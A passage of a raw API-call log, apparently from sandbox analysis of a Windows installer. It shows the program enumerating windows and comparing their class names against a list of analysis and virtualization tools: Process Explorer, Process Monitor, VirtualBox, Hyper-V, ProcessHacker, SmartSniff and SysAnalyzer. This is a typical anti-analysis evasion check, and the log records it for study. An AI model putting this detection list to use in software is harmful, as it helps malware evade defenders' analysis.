lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrlenA (lpString="") returned 0 [0158.495] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrlenA (lpString="") returned 0 [0158.496] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrlenA (lpString="") returned 0 [0158.496] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.496] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.496] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.496] lstrcmpiA 
(lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.496] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.496] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.496] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.496] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.496] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.496] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.497] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned 0x75710000 [0158.497] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.497] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.497] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.497] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.497] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.497] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.497] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.497] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.497] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.497] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.498] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.498] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.498] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] 
lstrlenA (lpString="0") returned 1 [0158.498] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.498] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.498] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.498] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.498] lstrlenA (lpString="0") returned 1 [0158.498] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.498] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.498] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.498] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.498] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.498] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.498] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.498] lstrlenA (lpString="3399936") returned 7 [0158.498] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.499] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.499] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.499] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.499] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.499] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.499] lstrcpynA 
(in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.499] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.499] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.499] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.499] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65690") returned 5 [0158.499] lstrcpyA (in: lpString1=0x430400, lpString2="65690" | out: lpString1="65690") returned="65690" [0158.499] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrlenA (lpString="callback1") returned 9 [0158.499] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.499] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.499] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.499] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.499] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.500] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.500] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.500] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.500] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.500] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.500] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.500] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.500] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.500] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.500] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.500] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.500] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.500] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.500] lstrcpynA (in: lpString1=0x341200, lpString2="65690", iMaxLength=1024 | out: lpString1="65690") returned="65690" [0158.500] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.500] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.500] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.500] GetWindowTextA (in: hWnd=0x1009a, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.501] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.501] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.501] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.501] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65690") returned 5 [0158.501] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.501] 
lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.501] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.501] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.501] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.501] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.501] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.501] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.501] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.501] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", 
iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.501] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.501] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.501] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.502] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.502] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.502] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.502] lstrcpynA (in: lpString1=0x340df8, lpString2="65690", iMaxLength=1024 | out: lpString1="65690") returned="65690" [0158.502] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.502] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.502] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.502] GetClassNameA (in: hWnd=0x1009a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.502] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.502] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65690") returned 5 [0158.502] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", 
iMaxLength=1024 | out: lpString1="0") returned="0" [0158.502] lstrlenA (lpString="0") returned 1 [0158.502] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] lstrlenA (lpString="tooltips_class32") returned 16 [0158.502] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.502] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.502] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.502] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.503] lstrcpynA 
(in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.503] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrlenA (lpString="tooltips_class32") returned 16 [0158.503] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.503] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.503] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrlenA (lpString="tooltips_class32") returned 16 [0158.504] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.504] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: 
lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrlenA (lpString="tooltips_class32") returned 16 [0158.504] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.504] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.504] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.504] lstrlenA (lpString="tooltips_class32") returned 16 [0158.504] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: 